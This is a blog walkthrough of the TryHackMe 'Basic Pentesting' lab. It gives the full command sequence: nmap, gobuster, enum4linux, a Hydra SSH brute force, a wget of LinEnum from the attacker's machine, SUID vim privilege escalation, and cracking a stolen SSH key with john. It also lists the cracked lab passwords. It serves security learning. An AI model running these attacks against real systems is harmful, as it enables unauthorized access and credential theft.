Hi! It is time to look at the Basic Pentesting room on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Room URL: https://tryhackme.com/room/basicpentestingjt
Task 1 (Web App Testing and Privilege Escalation)
In these set of tasks you’ll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
Credits to Josiah Pierce from Vulnhub.
Questions
Deploy the machine and connect to our network
Answer: No answer needed
Find the services exposed by the machine
This time I decided to use the following command:
nmap -sC -sV -oN nmap -p- <target ip>
The open ports are:
We can see a SSH service, SMB, a webserver, in addition to Jserv and Tomcat.
And the script results:
Answer: No answer needed
What is the name of the hidden directory on the web server(enter name without /)?
There is a web server running on port 80:
We can take a look at the source code:
Dev section…hmm.
Let’s search for hidden directories by using dirbuster or gobuster. We will use gobuster here. We can use the following command:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target ip>
We found found a development page. Maybe this is the one referred to in the source code!
Answer: development
User brute-forcing to find the username & password
Let’s have a look at the page we found:
Interesting. We get to see the files in the directory. Let’s have a look at both:
dev.txt:
j.txt:
A bunch of info here. We learn about Apache and SMB, but more importantly the author of dev.txt mentions Apache Struts, which is a Java Web Application framework. In addition he mentions version 2.5.12 and that he used a REST version.
In the other file we get a hint about weak credentials found in the /etc/shadow file.
But we don’t have access to to the system yet!
Remember back from the port scanning that we discovered SMB? Let’s enumerate that. We do this with the following command:
enum4linux <target ip>
This gives us a bunch of info on the SMB service:
We can see that anonymous access is possible using ‘’ as username and ‘’ as password. A bit further below we read the following lines:
Jan and Kay. Sure sounds like the users mentioned in j.txt. So we can pretty much conclude that Jan has a weak password.
Let’s try bruteforce Jan’s account with Hydra! We can use the following command:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target ip>
Let it run for a bit and you will find the answer:
Armando!
Answer: No answer needed
What is the username?
Answer: jan
BONUS:
We could also have figured this out by accessing the anonymous share through smbclient:
If we read this txt file:
What is the password?
See above to find the cracked password.
Answer: armando
What service do you use to access the server(answer in abbreviation in all caps)?
We have seen a SSH service running.
Answer: SSH
Enumerate the machine to find any vectors for privilege escalation
We can now login with SSH. We can use the following command:
ssh jan@<ip>
Then write the password when prompted. We get access to jan’s home directory:
If we look a bit further we can get into Kay’s home directory as well:
We can see pass.bak, which is a backup of some kind. Maybe a password?
To be able to get escalated privileges we can use a tool such as LinEnum to get more info on possible attack vectors. We need to do the following:
- Download LinEnum from here: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
You can copy the RAW text and enter it into a file called LinEnum. - Startup a simple Python web server from the directory of the new file: python -m http.server 8000.
- Download the file from the target machine: wget http://<attacker ip>:8000/LinEnum
- You need to give yourself executable privileges on the file: chmod +x LinEnum
- Run it!
Alternatively you can use scp to copy it over!
Read through the results. I will paste a few interesting tidbits here:
We can see that Kay is an admin.
We can read the passwd file, but not the shadow file.
Now this is interesting. Vim.basic is a SUID file, meaning we can run it with root privileges. Now we can use vim to read the pass.bak file from earlier!
This is actually the answer to the final question!
We can now change user with the new password:
Answer: No answer needed
What is the name of the other user you found(all lower case)?
Answer: kay
If you have found another user, what can you do with this information?
Well, here’s the thing. I already answered the final question. But on a more thorough look we can find out something interesting in Kay’s .ssh directory. There is a private key!
We can try logging in:
ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsa
Unfortunately we are missing a passphrase:
We can use john the ripper to crack this, specifically ssh2john. This is located on the following location:
Let’s run the following command after saving the rsa key on your attacker machine.
/opt/john/ssh2john.py kay_id_rsa > john_hash.txt
Now we can run John:
john john_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
And we find the passphrase:
Now we can login:
ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsa
And enter the passphrase beeswax.
This was another way in!
Answer: No answer needed
What is the final password you obtain?
We found this earlier through vim.
Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy
Thanks for reading. Hopefully you found out that there are many ways to get root access 🙂
Like my articles?
You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link: